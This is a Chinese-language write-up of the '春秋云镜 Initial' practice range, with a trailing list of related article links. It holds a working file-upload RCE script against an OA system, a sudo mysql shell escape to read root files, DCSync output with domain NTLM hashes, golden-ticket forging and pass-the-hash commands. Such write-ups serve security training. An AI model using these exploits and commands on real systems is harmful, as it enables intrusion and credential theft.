Initial

该靶场只有一个flag,有3部分,位于不同的机子上

flag01

开启靶场给了个ip
39.98.33.x
使用fscan浅扫一下
./fscan -h 39.98.33.x
找到了开放的80端口,指纹识别到是thinkphp5,直接使用工具
目标可以直接rce,写马进去
连入shell,发现是www-data权限
下一步提权
上传linpeas

chmod +x linpeas_linux_amd64
./linpeas_linux_amd64

得到结果,很多提权洞,这里使用sudo提权

sodu -l
sudo mysql -e '\! id'
sudo mysql -e '\! cat /root/flag/flag01.txt'

得到flag01:flag{60b53231-

flag02

之后也没有其他提示,浅扫一下内网
发现存在MS17010和另一个web站点,首先用frp把流量带出来
访问网站http://172.22.1.18/
这个系统有漏洞

import requestssession = requests.session()url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'data1 = {'rempass': '0','jmpass': 'false','device': '1625884034525','ltype': '0','adminuser': 'YWRtaW4=','adminpass': 'YWRtaW4xMjM=','yanzm': ''
}r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'r = session.get(url3)
r = session.get(url_pre + filepath + "?1=system('dir');")
print(r.text)

getshell后,找到flag02
flag{60b53231-2ce3-4813-87d4-

flag03

发现域
导出域内用户hash

meterpreter > kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv
[DC] 'xiaorang.lab' will be the domain
[DC] 'DC01.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
500     Administrator   10cf89a850fb1cdbe6bb432b859164c8        512
502     krbtgt  fb812eea13a18b7fcdb8e6d67ddc205b        514
1106    Marcus  e07510a4284b3c97c8e7dee970918c5c        512
1107    Charles f6a9881cd5ae709abb4ac9ab87f24617        512
1000    DC01$   edc506302bf9b040febfb84a1459c0e8        532480
1104    XIAORANG-OA01$  673ec2d0ad2f73341c4b3e1fc2fbade5        4096
1103    XIAORANG-WIN7$  507797b66f76b8b71d20555b0c59f86d        4096

生成黄金票据

kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /user:krbtgt

导入黄金票据

kiwi_cmd kerberos::golden /user:administrator /domain:xiaorang.lab /sid:S-1-5-21-314492864-3856862959-4045974917-502 /krbtgt:fb812eea13a18b7fcdb8e6d67ddc205b /pttUser      : administrator
Domain    : xiaorang.lab (XIAORANG)
SID       : S-1-5-21-314492864-3856862959-4045974917-502
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: fb812eea13a18b7fcdb8e6d67ddc205b - rc4_hmac_nt
Lifetime  : 2022/10/26 10:58:34 ; 2032/10/23 10:58:34 ; 2032/10/23 10:58:34
-> Ticket : ** Pass The Ticket *** PAC generated* PAC signed* EncTicketPart generated* EncTicketPart encrypted* KrbCred generatedGolden ticket for 'administrator @ xiaorang.lab' successfully submitted for current session

哈希传递
哈希传递:使用impacket包的wmiexec模块

https://github.com/SecureAuthCorp/impacket/

git clone https://github.com/SecureAuthCorp/impacket/
cd impacket pip install -r requirements.txtpip install impacketcd exexamplepython3 .\wmiexec.py xiaorang/administrator@172.22.1.2 -hashes :10cf89a850fb1cdbe6bb432b859164c8

拿到1.21这台机子,即可发现flag03

春秋云镜靶场Initial-WriteUP 专业徽章手把手教学相关推荐

  1. [春秋云镜]CVE-2022-23134

    声明:⽂中所涉及的技术.思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担.所有渗透都需获取授权! 靶场介绍 Zabbix Sia Zabbix是拉脱 ...

  2. [春秋云镜]CVE-2020-19960,CVE-2020-19961

    声明:⽂中所涉及的技术.思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担.所有渗透都需获取授权! 靶场介绍 zz cms 2019 存在sql注入漏 ...

  3. 春秋云镜wp day1

    春秋云镜wp day1 (qq.com) 建议关注公众号 websec.space,以后文章来csdn备份一份 今天看到之前买了内网渗透那本书,今天看到靶场上线了,打一天玩一下,总体cve的洞很好刷, ...

  4. [春秋云镜]CVE-2022-23043

    声明:⽂中所涉及的技术.思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担.所有渗透都需获取授权! 靶场介绍 Zenario CMS 9.2 文件上传 ...

  5. [春秋云镜]CVE-2022-2073

    声明:⽂中所涉及的技术.思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担.所有渗透都需获取授权! 靶场介绍 Grav CMS 可以通过 Twig 来 ...

  6. [春秋云镜]CVE-2022-24263

    声明:⽂中所涉及的技术.思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担.所有渗透都需获取授权! 靶场介绍 Hospital Management ...

  7. 3G0众测靶场-0407 WriteUp

    0x01 前言 昨天参加了3G0众测的题目,一直没来得及更新题目,今天的话看JC师傅整理了一下,我这边也来凑下热闹.内容挺基础,但是对一些CMS类型和框架不熟悉的话,就很容易走偏路,经常看响应包,还有 ...

  8. i春秋之荒岛求生write-up

    i春秋之荒岛求生write-up 第一关 这一关的答案是在题目的最后一句加粗的 躺平等死 和 勇敢战斗 中进行选择,结合前文中提到的 如果你想出去,就必须打败他们 自然得出答案是 勇敢战斗 . 第二关 ...

  9. 【春秋云镜 CVE-2022-30887wp】

    春秋云镜 CVE-2022-30887wp 开始愉快的打靶之旅吧 收集信息 任意文件上传 开始愉快的打靶之旅吧 春秋云镜链接 https://yunjing.ichunqiu.com 靶标介绍: 多语 ...

最新文章

  1. jquery源码解析:each,makeArray,merge,grep,map详解
  2. Deep Learning论文笔记之(五)CNN卷积神经网络代码理解
  3. 自媒体发展陷入僵局,社群媒体将成出路?呵呵…
  4. 如何处理alert、confirm、prompt对话框
  5. POJ 2142——扩展欧几里得
  6. redis启动警告解决
  7. mybatis传递多个参数_深入浅出MyBatis:MyBatis解析和运行原理
  8. 机器人出魔切还是三相_工业机器人常见故障和修理方法
  9. SharePoint 2010 - User Profile Sync Service自动停止
  10. 中美晶结盟华为 推动逆变器商机
  11. lodash 数组裁剪 drop
  12. 【汇编】从键盘输入16位有符号数x,y,z,w,编写程序实现:w=x+ y+24 - z,结果存放在w中, 并显示结果。
  13. 第1章 区块链是什么
  14. 点云学习笔记16——pcl点云可视化
  15. linux定时任务生效_Linux 定时任务不生效的问题
  16. 吃桃子削不削皮 如何吃有保证
  17. java 笔画排序_Java汉字排序(3)按笔划排序
  18. linux下用户名怎么修改密码,LINUX用户名密码忘记怎么修改用户密码
  19. 怎么把歌曲导入备忘录里
  20. 前端开发需要学什么(数据可视化)

热门文章

  1. 操作系统的概念 (OS学习笔记)
  2. Google左侧排名优化
  3. 什么是AP,什么是CP,什么是CAP?
  4. CAP理论-分布式系统的基础理论-------CP、AP案例场景分析
  5. ESO+LTV MPC算法笔记
  6. Gate 7.2的学习笔记(一)
  7. laravel db类
  8. 如何下载Windows 10?Windows 10微软官方下载地址、下载官方最新的Windows 10操作系统的具体步骤
  9. postman发启多次请求测试
  10. 03-django模型(1)